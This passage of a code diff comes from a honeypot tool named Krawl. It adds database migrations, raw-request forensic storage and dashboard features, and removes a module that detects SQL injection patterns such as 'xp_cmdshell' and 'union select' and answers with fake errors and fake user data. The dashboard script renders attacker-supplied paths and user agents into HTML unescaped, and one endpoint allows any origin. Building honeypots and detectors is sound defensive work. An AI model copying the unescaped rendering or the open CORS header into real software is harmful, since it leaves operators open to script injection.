self.send_header(
"Cache-Control", "no-store, no-cache, must-revalidate, max-age=0"
)
self.send_header("Pragma", "no-cache")
self.send_header("Expires", "0")
self.end_headers()
try:
parsed_url = urlparse(self.path)
query_params = parse_qs(parsed_url.query)
limit = int(query_params.get("limit", ["20"])[0])
limit = min(max(1, limit), 100) # Cap at 100
result = db.get_attack_types_stats(limit=limit)
self.wfile.write(json.dumps(result).encode())
except BrokenPipeError:
pass
except Exception as e:
self.app_logger.error(f"Error fetching attack types stats: {e}")
self.wfile.write(json.dumps({"error": str(e)}).encode())
return
# API endpoint for fetching raw request by log ID
if self.config.dashboard_secret_path and self.path.startswith(
f"{self.config.dashboard_secret_path}/api/raw-request/"
):
try:
# Extract log ID from path: /api/raw-request/123
log_id = int(self.path.split("/")[-1])
raw_request = db.get_raw_request_by_id(log_id)
if raw_request is None:
self.send_response(404)
self.send_header("Content-type", "application/json")
self.end_headers()
self.wfile.write(json.dumps({"error": "Raw request not found"}).encode())
else:
self.send_response(200)
self.send_header("Content-type", "application/json")
self.send_header("Access-Control-Allow-Origin", "*")
self.send_header("Cache-Control", "no-store, no-cache, must-revalidate, max-age=0")
self.end_headers()
self.wfile.write(json.dumps({"raw_request": raw_request}).encode())
except (ValueError, IndexError):
self.send_response(400)
self.send_header("Content-type", "application/json")
self.end_headers()
self.wfile.write(json.dumps({"error": "Invalid log ID"}).encode())
except Exception as e:
self.app_logger.error(f"Error fetching raw request: {e}")
self.send_response(500)
self.send_header("Content-type", "application/json")
self.end_headers()
self.wfile.write(json.dumps({"error": str(e)}).encode())
return
# API endpoint for downloading malicious IPs blocklist file # API endpoint for downloading malicious IPs blocklist file
if ( if (
self.config.dashboard_secret_path self.config.dashboard_secret_path
@@ -1014,10 +1175,9 @@ class Handler(BaseHTTPRequestHandler):
self.wfile.write(b"Internal server error") self.wfile.write(b"Internal server error")
return return
self.tracker.record_access(client_ip, self.path, user_agent, method="GET") self.tracker.record_access(client_ip, self.path, user_agent, method="GET",
raw_request=self._build_raw_request())
# self.analyzer.infer_user_category(client_ip)
# self.analyzer.update_ip_rep_infos(client_ip)
if self.tracker.is_suspicious_user_agent(user_agent): if self.tracker.is_suspicious_user_agent(user_agent):
self.access_logger.warning( self.access_logger.warning(

src/migrations/README.md Normal file

@@ -0,0 +1,60 @@
# Database Migrations
This directory contains database migration scripts for Krawl.
Since the 1.0.0 stable release, several new features require schema changes and performance optimizations. These migration scripts let existing users upgrade seamlessly, without data loss or downtime.
## Available Migrations
### add_raw_request_column.py
Adds the `raw_request` column to the `access_logs` table to store complete HTTP requests for forensic analysis.
**Usage:**
```bash
# Run with default database path (src/data/krawl.db)
python3 migrations/add_raw_request_column.py
# Run with custom database path
python3 migrations/add_raw_request_column.py /path/to/krawl.db
```
### add_performance_indexes.py
Adds critical performance indexes to the `attack_detections` table for efficient aggregation and filtering with large datasets (100k+ records).
**Indexes Added:**
- `ix_attack_detections_attack_type` - Speeds up GROUP BY on attack_type
- `ix_attack_detections_type_log` - Composite index for attack_type + access_log_id
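These indexes target the dashboard's aggregation queries. As a rough, self-contained illustration (schema reduced to just the columns the indexes cover), SQLite's query planner can answer the GROUP BY from an index alone:

```python
import sqlite3

# Minimal in-memory sketch; schema reduced to the relevant columns
conn = sqlite3.connect(":memory:")
conn.execute(
    "CREATE TABLE attack_detections ("
    "id INTEGER PRIMARY KEY, access_log_id INTEGER, attack_type TEXT)"
)
conn.execute(
    "CREATE INDEX ix_attack_detections_attack_type "
    "ON attack_detections(attack_type)"
)
conn.execute(
    "CREATE INDEX ix_attack_detections_type_log "
    "ON attack_detections(attack_type, access_log_id)"
)

# The GROUP BY behind the attack-types chart can be served by a
# "covering index" scan instead of a full table scan
plan = conn.execute(
    "EXPLAIN QUERY PLAN "
    "SELECT attack_type, COUNT(*) FROM attack_detections GROUP BY attack_type"
).fetchall()
print(plan)
```

On a populated database the difference shows up as the plan mentioning an index scan rather than `SCAN attack_detections`.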
**Usage:**
```bash
# Run with default database path
python3 migrations/add_performance_indexes.py
# Run with custom database path
python3 migrations/add_performance_indexes.py /path/to/krawl.db
```
**Post-Migration Optimization:**
```bash
# Compact database and update query planner statistics
sqlite3 /path/to/krawl.db "VACUUM; ANALYZE;"
```
## Running Migrations
All migration scripts are designed to be idempotent and safe to run multiple times. They will:
1. Check if the migration is already applied
2. Skip if already applied
3. Apply the migration if needed
4. Report the result
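The four steps above boil down to a small guard pattern. A minimal sketch (column and table names borrowed from `add_raw_request_column.py`, run here against an in-memory database):

```python
import sqlite3

def migrate(conn: sqlite3.Connection) -> str:
    """Idempotent migration sketch: check, skip or apply, then report."""
    cur = conn.cursor()
    cur.execute("PRAGMA table_info(access_logs)")
    existing = [row[1] for row in cur.fetchall()]
    if "raw_request" in existing:  # 1. check  2. skip if already applied
        return "already applied"
    cur.execute("ALTER TABLE access_logs ADD COLUMN raw_request TEXT")  # 3. apply
    conn.commit()
    return "applied"  # 4. report

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE access_logs (id INTEGER PRIMARY KEY, path TEXT)")
first = migrate(conn)   # applies the change
second = migrate(conn)  # safe no-op on the second run
print(first, second)
```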
## Creating New Migrations
When creating a new migration:
1. Name the file descriptively: `action_description.py`
2. Make it idempotent (safe to run multiple times)
3. Add checks before making changes
4. Provide clear error messages
5. Support custom database paths via command line
6. Update this README with usage instructions


@@ -0,0 +1,120 @@
#!/usr/bin/env python3
"""
Migration script to add performance indexes to attack_detections table.
This dramatically improves query performance with large datasets (100k+ records).
"""
import sqlite3
import sys
import os
def index_exists(cursor, index_name: str) -> bool:
"""Check if an index exists."""
cursor.execute("SELECT name FROM sqlite_master WHERE type='index' AND name=?", (index_name,))
return cursor.fetchone() is not None
def add_performance_indexes(db_path: str) -> bool:
"""
Add performance indexes to optimize queries.
Args:
db_path: Path to the SQLite database file
Returns:
True if indexes were added or already exist, False on error
"""
try:
# Check if database exists
if not os.path.exists(db_path):
print(f"Database file not found: {db_path}")
return False
# Connect to database
conn = sqlite3.connect(db_path)
cursor = conn.cursor()
indexes_added = []
indexes_existed = []
# Index 1: attack_type for efficient GROUP BY operations
if not index_exists(cursor, "ix_attack_detections_attack_type"):
print("Adding index on attack_detections.attack_type...")
cursor.execute("""
CREATE INDEX ix_attack_detections_attack_type
ON attack_detections(attack_type)
""")
indexes_added.append("ix_attack_detections_attack_type")
else:
indexes_existed.append("ix_attack_detections_attack_type")
# Index 2: Composite index for attack_type + access_log_id
if not index_exists(cursor, "ix_attack_detections_type_log"):
print("Adding composite index on attack_detections(attack_type, access_log_id)...")
cursor.execute("""
CREATE INDEX ix_attack_detections_type_log
ON attack_detections(attack_type, access_log_id)
""")
indexes_added.append("ix_attack_detections_type_log")
else:
indexes_existed.append("ix_attack_detections_type_log")
conn.commit()
conn.close()
# Report results
if indexes_added:
print(f"Successfully added {len(indexes_added)} index(es):")
for idx in indexes_added:
print(f" - {idx}")
if indexes_existed:
print(f" {len(indexes_existed)} index(es) already existed:")
for idx in indexes_existed:
print(f" - {idx}")
if not indexes_added and not indexes_existed:
print("No indexes processed")
return True
except sqlite3.Error as e:
print(f"SQLite error: {e}")
return False
except Exception as e:
print(f"Unexpected error: {e}")
return False
def main():
"""Main migration function."""
# Default database path
default_db_path = os.path.join(
os.path.dirname(os.path.dirname(__file__)),
"data",
"krawl.db"
)
# Allow custom path as command line argument
db_path = sys.argv[1] if len(sys.argv) > 1 else default_db_path
print(f"Adding performance indexes to database: {db_path}")
print("=" * 60)
success = add_performance_indexes(db_path)
print("=" * 60)
if success:
print("Migration completed successfully")
print("\n💡 Performance tip: Run 'VACUUM' and 'ANALYZE' on your database")
print(" to optimize query planner statistics after adding indexes.")
sys.exit(0)
else:
print("Migration failed")
sys.exit(1)
if __name__ == "__main__":
main()


@@ -0,0 +1,95 @@
#!/usr/bin/env python3
"""
Migration script to add raw_request column to access_logs table.
This script is safe to run multiple times - it checks if the column exists before adding it.
"""
import sqlite3
import sys
import os
from pathlib import Path
def column_exists(cursor, table_name: str, column_name: str) -> bool:
"""Check if a column exists in a table."""
cursor.execute(f"PRAGMA table_info({table_name})")
columns = [row[1] for row in cursor.fetchall()]
return column_name in columns
def add_raw_request_column(db_path: str) -> bool:
"""
Add raw_request column to access_logs table if it doesn't exist.
Args:
db_path: Path to the SQLite database file
Returns:
True if column was added or already exists, False on error
"""
try:
# Check if database exists
if not os.path.exists(db_path):
print(f"Database file not found: {db_path}")
return False
# Connect to database
conn = sqlite3.connect(db_path)
cursor = conn.cursor()
# Check if column already exists
if column_exists(cursor, "access_logs", "raw_request"):
print("Column 'raw_request' already exists in access_logs table")
conn.close()
return True
# Add the column
print("Adding 'raw_request' column to access_logs table...")
cursor.execute("""
ALTER TABLE access_logs
ADD COLUMN raw_request TEXT
""")
conn.commit()
conn.close()
print("✅ Successfully added 'raw_request' column to access_logs table")
return True
except sqlite3.Error as e:
print(f"SQLite error: {e}")
return False
except Exception as e:
print(f"Unexpected error: {e}")
return False
def main():
"""Main migration function."""
# Default database path
default_db_path = os.path.join(
os.path.dirname(os.path.dirname(__file__)),
"data",
"krawl.db"
)
# Allow custom path as command line argument
db_path = sys.argv[1] if len(sys.argv) > 1 else default_db_path
print(f"🔄 Running migration on database: {db_path}")
print("=" * 60)
success = add_raw_request_column(db_path)
print("=" * 60)
if success:
print("Migration completed successfully")
sys.exit(0)
else:
print("Migration failed")
sys.exit(1)
if __name__ == "__main__":
main()


@@ -63,6 +63,10 @@ class AccessLog(Base):
timestamp: Mapped[datetime] = mapped_column( timestamp: Mapped[datetime] = mapped_column(
DateTime, nullable=False, default=datetime.utcnow, index=True DateTime, nullable=False, default=datetime.utcnow, index=True
) )
# Raw HTTP request for forensic analysis (nullable for backward compatibility)
raw_request: Mapped[Optional[str]] = mapped_column(
String, nullable=True
)
# Relationship to attack detections # Relationship to attack detections
attack_detections: Mapped[List["AttackDetection"]] = relationship( attack_detections: Mapped[List["AttackDetection"]] = relationship(
@@ -126,7 +130,7 @@ class AttackDetection(Base):
nullable=False, nullable=False,
index=True, index=True,
) )
attack_type: Mapped[str] = mapped_column(String(50), nullable=False) attack_type: Mapped[str] = mapped_column(String(50), nullable=False, index=True)
matched_pattern: Mapped[Optional[str]] = mapped_column( matched_pattern: Mapped[Optional[str]] = mapped_column(
String(MAX_ATTACK_PATTERN_LENGTH), nullable=True String(MAX_ATTACK_PATTERN_LENGTH), nullable=True
) )
@@ -136,6 +140,9 @@ class AttackDetection(Base):
"AccessLog", back_populates="attack_detections" "AccessLog", back_populates="attack_detections"
) )
# Composite index for efficient aggregation queries
__table_args__ = (Index("ix_attack_detections_type_log", "attack_type", "access_log_id"),)
def __repr__(self) -> str: def __repr__(self) -> str:
return f"<AttackDetection(id={self.id}, type='{self.attack_type}')>" return f"<AttackDetection(id={self.id}, type='{self.attack_type}')>"


@@ -10,7 +10,6 @@ from http.server import HTTPServer
from config import get_config from config import get_config
from tracker import AccessTracker from tracker import AccessTracker
from analyzer import Analyzer
from handler import Handler from handler import Handler
from logger import ( from logger import (
initialize_logging, initialize_logging,
@@ -75,11 +74,9 @@ def main():
) )
tracker = AccessTracker(config.max_pages_limit, config.ban_duration_seconds) tracker = AccessTracker(config.max_pages_limit, config.ban_duration_seconds)
analyzer = Analyzer()
Handler.config = config Handler.config = config
Handler.tracker = tracker Handler.tracker = tracker
Handler.analyzer = analyzer
Handler.counter = config.canary_token_tries Handler.counter = config.canary_token_tries
Handler.app_logger = app_logger Handler.app_logger = app_logger
Handler.access_logger = access_logger Handler.access_logger = access_logger


@@ -1,65 +0,0 @@
#!/usr/bin/env python3
import random
from wordlists import get_wordlists
def generate_server_error() -> tuple[str, str]:
wl = get_wordlists()
server_errors = wl.server_errors
if not server_errors:
return ("500 Internal Server Error", "text/html")
server_type = random.choice(list(server_errors.keys()))
server_config = server_errors[server_type]
error_codes = {
400: "Bad Request",
401: "Unauthorized",
403: "Forbidden",
404: "Not Found",
500: "Internal Server Error",
502: "Bad Gateway",
503: "Service Unavailable",
}
code = random.choice(list(error_codes.keys()))
message = error_codes[code]
template = server_config.get("template", "")
version = random.choice(server_config.get("versions", ["1.0"]))
html = template.replace("{code}", str(code))
html = html.replace("{message}", message)
html = html.replace("{version}", version)
if server_type == "apache":
os = random.choice(server_config.get("os", ["Ubuntu"]))
html = html.replace("{os}", os)
html = html.replace("{host}", "localhost")
return (html, "text/html")
def get_server_header(server_type: str = None) -> str:
wl = get_wordlists()
server_errors = wl.server_errors
if not server_errors:
return "nginx/1.18.0"
if not server_type:
server_type = random.choice(list(server_errors.keys()))
server_config = server_errors.get(server_type, {})
version = random.choice(server_config.get("versions", ["1.0"]))
server_headers = {
"nginx": f"nginx/{version}",
"apache": f"Apache/{version}",
"iis": f"Microsoft-IIS/{version}",
"tomcat": f"Apache-Coyote/1.1",
}
return server_headers.get(server_type, "nginx/1.18.0")


@@ -1,115 +0,0 @@
#!/usr/bin/env python3
import random
import re
from typing import Optional, Tuple
from wordlists import get_wordlists
def detect_sql_injection_pattern(query_string: str) -> Optional[str]:
if not query_string:
return None
query_lower = query_string.lower()
patterns = {
"quote": [r"'", r'"', r"`"],
"comment": [r"--", r"#", r"/\*", r"\*/"],
"union": [r"\bunion\b", r"\bunion\s+select\b"],
"boolean": [r"\bor\b.*=.*", r"\band\b.*=.*", r"'.*or.*'.*=.*'"],
"time_based": [r"\bsleep\b", r"\bwaitfor\b", r"\bdelay\b", r"\bbenchmark\b"],
"stacked": [r";.*select", r";.*drop", r";.*insert", r";.*update", r";.*delete"],
"command": [r"\bexec\b", r"\bexecute\b", r"\bxp_cmdshell\b"],
"info_schema": [r"information_schema", r"table_schema", r"table_name"],
}
for injection_type, pattern_list in patterns.items():
for pattern in pattern_list:
if re.search(pattern, query_lower):
return injection_type
return None
def get_random_sql_error(
db_type: str = None, injection_type: str = None
) -> Tuple[str, str]:
wl = get_wordlists()
sql_errors = wl.sql_errors
if not sql_errors:
return ("Database error occurred", "text/plain")
if not db_type:
db_type = random.choice(list(sql_errors.keys()))
db_errors = sql_errors.get(db_type, {})
if injection_type and injection_type in db_errors:
errors = db_errors[injection_type]
elif "generic" in db_errors:
errors = db_errors["generic"]
else:
all_errors = []
for error_list in db_errors.values():
if isinstance(error_list, list):
all_errors.extend(error_list)
errors = all_errors if all_errors else ["Database error occurred"]
error_message = random.choice(errors) if errors else "Database error occurred"
if "{table}" in error_message:
tables = ["users", "products", "orders", "customers", "accounts", "sessions"]
error_message = error_message.replace("{table}", random.choice(tables))
if "{column}" in error_message:
columns = ["id", "name", "email", "password", "username", "created_at"]
error_message = error_message.replace("{column}", random.choice(columns))
return (error_message, "text/plain")
def generate_sql_error_response(
query_string: str, db_type: str = None
) -> Tuple[str, str, int]:
injection_type = detect_sql_injection_pattern(query_string)
if not injection_type:
return (None, None, None)
error_message, content_type = get_random_sql_error(db_type, injection_type)
status_code = 500
if random.random() < 0.3:
status_code = 200
return (error_message, content_type, status_code)
def get_sql_response_with_data(path: str, params: str) -> str:
import json
from generators import random_username, random_email, random_password
injection_type = detect_sql_injection_pattern(params)
if injection_type in ["union", "boolean", "stacked"]:
data = {
"success": True,
"results": [
{
"id": i,
"username": random_username(),
"email": random_email(),
"password_hash": random_password(),
"role": random.choice(["admin", "user", "moderator"]),
}
for i in range(1, random.randint(2, 5))
],
}
return json.dumps(data, indent=2)
return json.dumps(
{"success": True, "message": "Query executed successfully", "results": []},
indent=2,
)


@@ -112,24 +112,8 @@ def main():
ip_accesses = db_manager.get_access_logs(limit=999999999, ip_filter=ip) ip_accesses = db_manager.get_access_logs(limit=999999999, ip_filter=ip)
total_accesses_count = len(ip_accesses) total_accesses_count = len(ip_accesses)
if total_accesses_count <= 0: if total_accesses_count <= 0:
return continue
# Set category as "unknown" for the first 3 requests
if total_accesses_count < 3:
category = "unknown"
analyzed_metrics = {}
category_scores = {
"attacker": 0,
"good_crawler": 0,
"bad_crawler": 0,
"regular_user": 0,
"unknown": 0,
}
last_analysis = datetime.now()
db_manager.update_ip_stats_analysis(
ip, analyzed_metrics, category, category_scores, last_analysis
)
return 0
# --------------------- HTTP Methods --------------------- # --------------------- HTTP Methods ---------------------
get_accesses_count = len( get_accesses_count = len(
[item for item in ip_accesses if item["method"] == "GET"] [item for item in ip_accesses if item["method"] == "GET"]


@@ -48,22 +48,67 @@ def generate_dashboard(stats: dict, dashboard_path: str = "") -> str:
dashboard_path: The secret dashboard path for generating API URLs dashboard_path: The secret dashboard path for generating API URLs
""" """
# Generate suspicious accesses rows with clickable IPs # Generate comprehensive suspicious activity rows combining all suspicious events
suspicious_activities = []
# Add recent suspicious accesses (attacks)
for log in stats.get("recent_suspicious", [])[-20:]:
suspicious_activities.append({
"type": "Attack",
"ip": log["ip"],
"path": log["path"],
"user_agent": log["user_agent"][:60],
"timestamp": log["timestamp"],
"details": ", ".join(log.get("attack_types", [])) if log.get("attack_types") else "Suspicious behavior"
})
# Add credential attempts
for cred in stats.get("credential_attempts", [])[-20:]:
suspicious_activities.append({
"type": "Credentials",
"ip": cred["ip"],
"path": cred["path"],
"user_agent": "",
"timestamp": cred["timestamp"],
"details": f"User: {cred.get('username', 'N/A')}"
})
# Add honeypot triggers
for honeypot in stats.get("honeypot_triggered_ips", [])[-20:]:
paths = honeypot.get("paths", []) if isinstance(honeypot.get("paths"), list) else []
suspicious_activities.append({
"type": "Honeypot",
"ip": honeypot["ip"],
"path": paths[0] if paths else "Multiple",
"user_agent": "",
"timestamp": honeypot.get("last_seen", honeypot.get("timestamp", "")),
"details": f"{len(paths)} trap(s) triggered"
})
# Sort by timestamp (most recent first) and take last 20
try:
suspicious_activities.sort(key=lambda x: x["timestamp"], reverse=True)
except TypeError:
pass  # mixed timestamp types; fall back to insertion order
suspicious_activities = suspicious_activities[:20]
# Generate table rows
suspicious_rows = ( suspicious_rows = (
"\n".join([f"""<tr class="ip-row" data-ip="{_escape(log["ip"])}"> "\n".join([f"""<tr class="ip-row" data-ip="{_escape(activity["ip"])}">
<td class="ip-clickable">{_escape(log["ip"])}</td> <td class="ip-clickable">{_escape(activity["ip"])}</td>
<td>{_escape(log["path"])}</td> <td>{_escape(activity["type"])}</td>
<td style="word-break: break-all;">{_escape(log["user_agent"][:60])}</td> <td>{_escape(activity["path"])}</td>
<td>{format_timestamp(log["timestamp"], time_only=True)}</td> <td style="word-break: break-all;">{_escape(activity["details"])}</td>
<td>{format_timestamp(activity["timestamp"], time_only=True)}</td>
</tr> </tr>
<tr class="ip-stats-row" id="stats-row-suspicious-{_escape(log["ip"]).replace(".", "-")}" style="display: none;"> <tr class="ip-stats-row" id="stats-row-suspicious-{_escape(activity["ip"]).replace(".", "-")}-{suspicious_activities.index(activity)}" style="display: none;">
<td colspan="4" class="ip-stats-cell"> <td colspan="5" class="ip-stats-cell">
<div class="ip-stats-dropdown"> <div class="ip-stats-dropdown">
<div class="loading">Loading stats...</div> <div class="loading">Loading stats...</div>
</div> </div>
</td> </td>
</tr>""" for log in stats["recent_suspicious"][-10:]]) </tr>""" for activity in suspicious_activities])
or '<tr><td colspan="4" style="text-align:center;">No suspicious activity detected</td></tr>' or '<tr><td colspan="5" style="text-align:center;">No suspicious activity detected</td></tr>'
) )
return f"""<!DOCTYPE html> return f"""<!DOCTYPE html>
@@ -708,6 +753,91 @@ def generate_dashboard(stats: dict, dashboard_path: str = "") -> str:
max-height: 400px; max-height: 400px;
}} }}
/* Raw Request Modal */
.raw-request-modal {{
display: none;
position: fixed;
z-index: 1000;
left: 0;
top: 0;
width: 100%;
height: 100%;
background-color: rgba(0, 0, 0, 0.7);
overflow: auto;
}}
.raw-request-modal-content {{
background-color: #161b22;
margin: 5% auto;
padding: 0;
border: 1px solid #30363d;
border-radius: 6px;
width: 80%;
max-width: 900px;
box-shadow: 0 8px 32px rgba(0, 0, 0, 0.5);
}}
.raw-request-modal-header {{
padding: 16px 20px;
background-color: #21262d;
border-bottom: 1px solid #30363d;
border-radius: 6px 6px 0 0;
display: flex;
justify-content: space-between;
align-items: center;
}}
.raw-request-modal-header h3 {{
margin: 0;
color: #58a6ff;
font-size: 16px;
}}
.raw-request-modal-close {{
color: #8b949e;
font-size: 28px;
font-weight: bold;
cursor: pointer;
line-height: 20px;
transition: color 0.2s;
}}
.raw-request-modal-close:hover {{
color: #c9d1d9;
}}
.raw-request-modal-body {{
padding: 20px;
}}
.raw-request-content {{
background-color: #0d1117;
border: 1px solid #30363d;
border-radius: 6px;
padding: 16px;
font-family: 'Courier New', Courier, monospace;
font-size: 12px;
color: #c9d1d9;
white-space: pre-wrap;
word-wrap: break-word;
max-height: 400px;
overflow-y: auto;
}}
.raw-request-modal-footer {{
padding: 16px 20px;
background-color: #21262d;
border-top: 1px solid #30363d;
border-radius: 0 0 6px 6px;
text-align: right;
}}
.raw-request-download-btn {{
padding: 8px 16px;
background: #238636;
color: #ffffff;
border: none;
border-radius: 6px;
font-weight: 500;
font-size: 13px;
cursor: pointer;
transition: background 0.2s;
}}
.raw-request-download-btn:hover {{
background: #2ea043;
}}
/* Mobile Optimization - Tablets (768px and down) */ /* Mobile Optimization - Tablets (768px and down) */
@media (max-width: 768px) {{ @media (max-width: 768px) {{
body {{ body {{
@@ -1100,8 +1230,9 @@ def generate_dashboard(stats: dict, dashboard_path: str = "") -> str:
<thead> <thead>
<tr> <tr>
<th>IP Address</th> <th>IP Address</th>
<th>Type</th>
<th>Path</th> <th>Path</th>
<th>User-Agent</th> <th>Details</th>
<th>Time</th> <th>Time</th>
</tr> </tr>
</thead> </thead>
@@ -1311,10 +1442,11 @@ def generate_dashboard(stats: dict, dashboard_path: str = "") -> str:
<th>Attack Types</th> <th>Attack Types</th>
<th>User-Agent</th> <th>User-Agent</th>
<th class="sortable" data-sort="timestamp" data-table="attacks">Time</th> <th class="sortable" data-sort="timestamp" data-table="attacks">Time</th>
<th>Actions</th>
</tr> </tr>
</thead> </thead>
<tbody id="attacks-tbody"> <tbody id="attacks-tbody">
<tr><td colspan="6" style="text-align: center;">Loading...</td></tr> <tr><td colspan="7" style="text-align: center;">Loading...</td></tr>
</tbody> </tbody>
</table> </table>
</div> </div>
@@ -1338,6 +1470,23 @@ def generate_dashboard(stats: dict, dashboard_path: str = "") -> str:
</div> </div>
</div> </div>
</div> </div>
<div id="raw-request-modal" class="raw-request-modal">
<div class="raw-request-modal-content">
<div class="raw-request-modal-header">
<h3>Raw HTTP Request</h3>
<span class="raw-request-modal-close" onclick="closeRawRequestModal()">&times;</span>
</div>
<div class="raw-request-modal-body">
<div id="raw-request-content" class="raw-request-content">
<!-- Dynamically populated -->
</div>
</div>
<div class="raw-request-modal-footer">
<button class="raw-request-download-btn" onclick="downloadRawRequest()">Download as .txt</button>
</div>
</div>
</div>
</div> </div>
<script> <script>
const DASHBOARD_PATH = '{dashboard_path}'; const DASHBOARD_PATH = '{dashboard_path}';
@@ -2270,7 +2419,7 @@ def generate_dashboard(stats: dict, dashboard_path: str = "") -> str:
'top-ips': {{ endpoint: 'top-ips', dataKey: 'ips', cellCount: 3, columns: ['ip', 'count'] }}, 'top-ips': {{ endpoint: 'top-ips', dataKey: 'ips', cellCount: 3, columns: ['ip', 'count'] }},
'top-paths': {{ endpoint: 'top-paths', dataKey: 'paths', cellCount: 3, columns: ['path', 'count'] }}, 'top-paths': {{ endpoint: 'top-paths', dataKey: 'paths', cellCount: 3, columns: ['path', 'count'] }},
'top-ua': {{ endpoint: 'top-user-agents', dataKey: 'user_agents', cellCount: 3, columns: ['user_agent', 'count'] }}, 'top-ua': {{ endpoint: 'top-user-agents', dataKey: 'user_agents', cellCount: 3, columns: ['user_agent', 'count'] }},
attacks: {{ endpoint: 'attack-types', dataKey: 'attacks', cellCount: 6, columns: ['ip', 'path', 'attack_types', 'user_agent', 'timestamp'] }} attacks: {{ endpoint: 'attack-types', dataKey: 'attacks', cellCount: 7, columns: ['ip', 'path', 'attack_types', 'user_agent', 'timestamp', 'raw_request'] }}
}}; }};
// Load overview table on page load // Load overview table on page load
@@ -2344,9 +2493,12 @@ def generate_dashboard(stats: dict, dashboard_path: str = "") -> str:
}} else if (tableId === 'top-ua') {{ }} else if (tableId === 'top-ua') {{
html += `<tr><td class="rank">${{rank}}</td><td style="word-break: break-all;">${{item.user_agent.substring(0, 80)}}</td><td>${{item.count}}</td></tr>`; html += `<tr><td class="rank">${{rank}}</td><td style="word-break: break-all;">${{item.user_agent.substring(0, 80)}}</td><td>${{item.count}}</td></tr>`;
}} else if (tableId === 'attacks') {{ }} else if (tableId === 'attacks') {{
html += `<tr class="ip-row" data-ip="${{item.ip}}"><td class="rank">${{rank}}</td><td class="ip-clickable">${{item.ip}}</td><td>${{item.path}}</td><td>${{item.attack_types.join(', ')}}</td><td style="word-break: break-all;">${{item.user_agent.substring(0, 60)}}</td><td>${{formatTimestamp(item.timestamp, true)}}</td></tr>`; const actionBtn = item.raw_request
? `<button class="action-btn" onclick="viewRawRequest(${{item.id}})" style="padding: 4px 8px; background: #0969da; color: white; border: none; border-radius: 4px; cursor: pointer; font-size: 11px;">View Request</button>`
: `<span style="color: #6e7681; font-size: 11px;">N/A</span>`;
html += `<tr class="ip-row" data-ip="${{item.ip}}"><td class="rank">${{rank}}</td><td class="ip-clickable">${{item.ip}}</td><td>${{item.path}}</td><td>${{item.attack_types.join(', ')}}</td><td style="word-break: break-all;">${{item.user_agent.substring(0, 60)}}</td><td>${{formatTimestamp(item.timestamp, true)}}</td><td>${{actionBtn}}</td></tr>`;
html += `<tr class="ip-stats-row" id="stats-row-attacks-${{item.ip.replace(/\\./g, '-')}}" style="display: none;"> html += `<tr class="ip-stats-row" id="stats-row-attacks-${{item.ip.replace(/\\./g, '-')}}" style="display: none;">
<td colspan="6" class="ip-stats-cell"> <td colspan="7" class="ip-stats-cell">
<div class="ip-stats-dropdown"> <div class="ip-stats-dropdown">
<div class="loading">Loading stats...</div> <div class="loading">Loading stats...</div>
</div> </div>
@@ -2924,7 +3076,8 @@ def generate_dashboard(stats: dict, dashboard_path: str = "") -> str:
const canvas = document.getElementById('attack-types-chart'); const canvas = document.getElementById('attack-types-chart');
if (!canvas) return; if (!canvas) return;
const response = await fetch(DASHBOARD_PATH + '/api/attack-types?page=1&page_size=100', {{ // Use the new efficient aggregated endpoint
const response = await fetch(DASHBOARD_PATH + '/api/attack-types-stats?limit=20', {{
cache: 'no-store', cache: 'no-store',
headers: {{ headers: {{
'Cache-Control': 'no-cache', 'Cache-Control': 'no-cache',
@@ -2932,38 +3085,19 @@ def generate_dashboard(stats: dict, dashboard_path: str = "") -> str:
}} }}
}}); }});
if (!response.ok) throw new Error('Failed to fetch attack types'); if (!response.ok) throw new Error('Failed to fetch attack types stats');
const data = await response.json(); const data = await response.json();
const attacks = data.attacks || []; const attackTypes = data.attack_types || [];
if (attacks.length === 0) {{ if (attackTypes.length === 0) {{
canvas.style.display = 'none'; canvas.style.display = 'none';
return; return;
}} }}
// Aggregate attack types // Data is already aggregated and sorted from the database
const attackCounts = {{}}; const labels = attackTypes.slice(0, 10).map(item => item.type);
attacks.forEach(attack => {{ const counts = attackTypes.slice(0, 10).map(item => item.count);
if (attack.attack_types && Array.isArray(attack.attack_types)) {{
attack.attack_types.forEach(type => {{
attackCounts[type] = (attackCounts[type] || 0) + 1;
}});
}}
}});
// Sort and get top 10
const sortedAttacks = Object.entries(attackCounts)
.sort((a, b) => b[1] - a[1])
.slice(0, 10);
if (sortedAttacks.length === 0) {{
canvas.style.display = 'none';
return;
}}
const labels = sortedAttacks.map(([type]) => type);
const counts = sortedAttacks.map(([, count]) => count);
const maxCount = Math.max(...counts); const maxCount = Math.max(...counts);
// Enhanced color palette with gradients // Enhanced color palette with gradients
@@ -3137,6 +3271,64 @@ def generate_dashboard(stats: dict, dashboard_path: str = "") -> str:
console.error('Error loading attack types chart:', err); console.error('Error loading attack types chart:', err);
}} }}
}} }}
// Raw Request Modal functions
let currentRawRequest = '';
async function viewRawRequest(logId) {{
try {{
const response = await fetch(`${{DASHBOARD_PATH}}/api/raw-request/${{logId}}`, {{
cache: 'no-store'
}});
if (response.status === 404) {{
alert('Raw request not available');
return;
}}
if (!response.ok) throw new Error('Failed to fetch data');
const data = await response.json();
if (!data.raw_request) {{
alert('Raw request not available');
return;
}}
currentRawRequest = data.raw_request;
document.getElementById('raw-request-content').textContent = currentRawRequest;
document.getElementById('raw-request-modal').style.display = 'block';
}} catch (err) {{
console.error('Error loading raw request:', err);
alert('Failed to load raw request');
}}
}}
function closeRawRequestModal() {{
document.getElementById('raw-request-modal').style.display = 'none';
}}
function downloadRawRequest() {{
if (!currentRawRequest) return;
const blob = new Blob([currentRawRequest], {{ type: 'text/plain' }});
const url = URL.createObjectURL(blob);
const a = document.createElement('a');
a.href = url;
a.download = `raw-request-${{Date.now()}}.txt`;
document.body.appendChild(a);
a.click();
document.body.removeChild(a);
URL.revokeObjectURL(url);
}}
// Close modal when clicking outside
window.onclick = function(event) {{
const modal = document.getElementById('raw-request-modal');
if (event.target === modal) {{
closeRawRequestModal();
}}
}}
</script>
</body>
</html>
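For reference, the top-10 aggregation that the chart script above performs in JavaScript can be sketched in Python as well (`top_attack_types` is an illustrative helper, not part of the project):

```python
from collections import Counter

def top_attack_types(logs, limit=10):
    """Aggregate attack_types across log entries and return the most common."""
    counts = Counter()
    for entry in logs:
        # attack_types may be None, mirroring the null check in the JS above
        for attack_type in entry.get("attack_types") or []:
            counts[attack_type] += 1
    return counts.most_common(limit)

logs = [
    {"attack_types": ["sql_injection", "common_probes"]},
    {"attack_types": ["sql_injection"]},
    {"attack_types": None},
]
print(top_attack_types(logs))  # [('sql_injection', 2), ('common_probes', 1)]
```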


@@ -49,32 +49,37 @@ class AccessTracker:
